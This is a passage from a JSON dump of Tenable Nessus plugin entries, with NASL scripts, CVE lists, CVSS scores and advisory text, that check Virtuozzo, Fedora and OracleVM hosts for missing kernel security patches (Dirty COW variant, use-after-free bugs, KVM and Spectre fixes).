script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:18", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. 
A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-110.NASL", "href": "https://www.tenable.com/plugins/nessus/105166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105166);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-110)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that 
socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909950\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6bc504c3\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:54", "description": "Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "modified": "2018-01-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-B0C1F44130.NASL", "href": "https://www.tenable.com/plugins/nessus/105954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-b0c1f44130.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n 
script_id(105954);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n\n script_name(english:\"Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-b0c1f44130\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-b0c1f44130\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.13.16-302.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:35", "description": "Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-05T00:00:00", "title": "Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-9EA11E444D.NASL", "href": 
"https://www.tenable.com/plugins/nessus/105013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9ea11e444d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105013);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n\n script_name(english:\"Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9ea11e444d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-9ea11e444d\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.13.16-202.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:52:11", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.'\n (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur\n Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line\n (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function\n (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic\n (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code\n (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug\n (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU 
vulnerabilites sysfs functions\n (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation\n (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner)\n [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David\n Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup\n (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts\n (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407)\n (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason)\n [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao\n Martins)", "edition": 28, "cvss3": {"score": 7.4, "vector": "AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-01-22T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2018-0012.NASL", "href": "https://www.tenable.com/plugins/nessus/106226", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0012.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106226);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote 
OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.'\n (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur\n Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line\n (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function\n (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic\n (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code\n (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug\n (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU vulnerabilites sysfs functions\n (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation\n (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner)\n [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David\n Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup\n (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts\n (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407)\n (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason)\n [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao\n Martins)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-January/000822.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?026e66b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware 
packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", 